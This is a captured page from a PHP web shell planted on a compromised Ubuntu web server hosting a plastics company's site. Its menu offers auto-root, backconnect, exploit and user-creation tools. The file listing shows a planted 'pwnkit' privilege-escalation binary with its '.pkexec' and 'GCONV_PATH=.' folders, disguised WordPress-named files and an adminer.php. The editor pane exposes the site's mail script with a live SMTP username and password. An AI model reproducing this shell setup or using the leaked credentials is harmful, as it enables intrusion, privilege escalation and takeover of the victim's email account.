Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
callegariplasticos /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
mail
[ DIR ]
drwxr-xr-x
señalizacion
[ DIR ]
drwxr-xr-x
termoformados
[ DIR ]
drwxr-xr-x
troquelados
[ DIR ]
drwxr-xr-x
varios
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
contact.html
14.18
KB
-rw-r--r--
correctCaptcha.php
881
B
-rw-r--r--
enviar.php
1.25
KB
-rw-r--r--
enviarMailer.php
2.37
KB
-rw-r--r--
favicon.ico
6.89
KB
-rw-r--r--
gracias.html
10.79
KB
-rw-r--r--
index.html
34.73
KB
-rw-r--r--
nosotros.html
12.61
KB
-rw-r--r--
nuestros-productos.html
30.79
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
single-blog.html
19.56
KB
-rw-r--r--
wp-blog-header.php
2.74
KB
-rw-r--r--
wp-cron.php
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : enviarMailer.php
<?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; require 'mail/Exception.php'; require 'mail/PHPMailer.php'; require 'mail/SMTP.php'; //Instantiation and passing `true` enables exceptions $mail = new PHPMailer(true); $nombre = strip_tags($_POST['name']); $correo = strip_tags($_POST['email']); $telefono = strip_tags($_POST['phone']); $comentario = strip_tags($_POST['message']); try { //Server settings $mail->SMTPDebug = 0; //Enable verbose debug output $mail->isSMTP(); //Send using SMTP $mail->Host = 'mail1.correopremium.com'; //Set the SMTP server to send through $mail->SMTPAuth = true; //Enable SMTP authentication $mail->Username = 'callegariplasticos@callegariplasticos.com'; //SMTP username $mail->Password = 'Callegari#2o21%'; //SMTP password $mail->SMTPSecure = 'ssl'; //Enable TLS encryption; `PHPMailer::ENCRYPTION_SMTPS` encouraged $mail->Port = 465; //TCP port to connect to, use 465 for `PHPMailer::ENCRYPTION_SMTPS` above //Recipients $mail->setFrom('callegariplasticos@callegariplasticos.com', 'Contacto WEB desde Callegari'); $mail->addAddress('callegariplasticos@callegariplasticos.com', 'callegariplasticos@callegariplasticos.com'); //Add a recipient $mail->addAddress('comercial01@callegariplasticos.com', 'callegariplasticos@callegariplasticos.com'); //Add a recipient $mail->addAddress('mercadeo@insepet.com', 'mercadeo@insepet.com'); //Add a recipient //Content $mail->isHTML(true); //Set email format to HTML $mail->Subject = 'Formulario desde Callegari'; $mail->Body = " <html> <body> <h3>Nuevo mensaje desde el formulario de contacto</h3> <p><strong>Nombre:</strong> {$nombre}<br /> <strong>Email:</strong> {$correo}<br /> <strong>Telefono:</strong> {$telefono}<br /> <strong>Mensaje:</strong> {$comentario}</p> </body> </html> <br />"; // Texto del email en formato HTML; $mail->send(); header("location:gracias.html"); } catch (Exception $e) { echo "Message could not be sent. Mailer Error: {$mail->ErrorInfo}"; }
Close